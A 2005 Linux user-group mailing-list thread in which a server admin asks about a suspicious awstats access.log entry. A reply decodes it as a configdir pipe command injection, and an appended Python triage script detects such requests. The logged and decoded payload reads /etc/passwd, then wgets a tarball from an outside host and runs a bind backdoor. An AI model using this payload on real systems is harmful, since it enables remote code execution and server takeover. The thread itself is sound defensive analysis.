Miles Beck wrote:

>I have awstats running on a server and saw this entry in my access.log. Can
>someone look at this and determine what the person was trying to do?
>
>I want to make sure they did nothing to the box.
>
>65.67.68.194 - - [17/Feb/2005:10:31:29 -0700] "GET
>/cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd
>%3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2
>ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar%20%2dxvzf
>%20tw%2etar%2egz%3bcd%20tw%3b%2e%2fbind%3becho%20Instalam%20bind%20in%20%2ftmp
>%3bcd%20%2ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar
>%20%2dxvzf%20tw%2etar%2egz%3bcd%20rw%3b%2e%2fbind%3becho%20%2d%2d%2d%2d%2d%2d%2d
>%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20by%20Zorg%20of%20
>texter%21%3becho%20e_exp%3b%2500 HTTP/1.1" 200 526347 "-" "-"
>
>-------------------------------------------------
>FastQ Communications
>Providing Innovative Internet Solutions Since 1993
>
>---------------------------------------------------
>PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
>To subscribe, unsubscribe, or to change you mail settings:
>http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>

At first glance it looks like an exploit; it's using the pipe to run commands:

/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cat /etc/passwd
;uname -a;id;echo Instalam Bind in /var/tmp;cd /var%2
ftmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd tw;./bind;echo Instalam bind in /tmp
;cd /tmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd rw;./bind;echo
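
An added example, not part of the original thread: a small Python triage script that does the decoding shown in the reply automatically, pulling each query parameter out of an Apache combined-format log line, percent-decoding it, and flagging values that contain shell metacharacters. The function name `analyze`, the metacharacter set, and both sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format: host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Characters that hand a parameter value to a shell (pipe, separator, substitution).
SHELL_META = re.compile(r'[|;`]|\$\(')

def analyze(line):
    """Return a finding for a request whose decoded query hits SHELL_META, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    # parse_qsl percent-decodes each value exactly once.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SHELL_META.search(value):
            # Split on ';' only to list each decoded command for the analyst.
            cmds = [c.strip() for c in value.lstrip("|").split(";") if c.strip()]
            return {"host": m.group("host"), "param": name,
                    "status": int(m.group("status")), "commands": cmds}
    return None

# Constructed sample lines (documentation IPs, shortened request), not real log data.
SAMPLE_BAD = ('192.0.2.10 - - [17/Feb/2005:10:31:29 -0700] "GET '
              '/cgi-bin/awstats.pl?configdir=%7cecho%20%3bid%3buname%20%2da%3b%2500 '
              'HTTP/1.1" 200 526347 "-" "-"')
SAMPLE_OK = ('192.0.2.11 - - [17/Feb/2005:10:32:02 -0700] "GET '
             '/cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "-"')

if __name__ == "__main__":
    for sample in (SAMPLE_BAD, SAMPLE_OK):
        print(analyze(sample))
```

A match shows what was requested, not whether it executed; confirming that needs checks on the host itself.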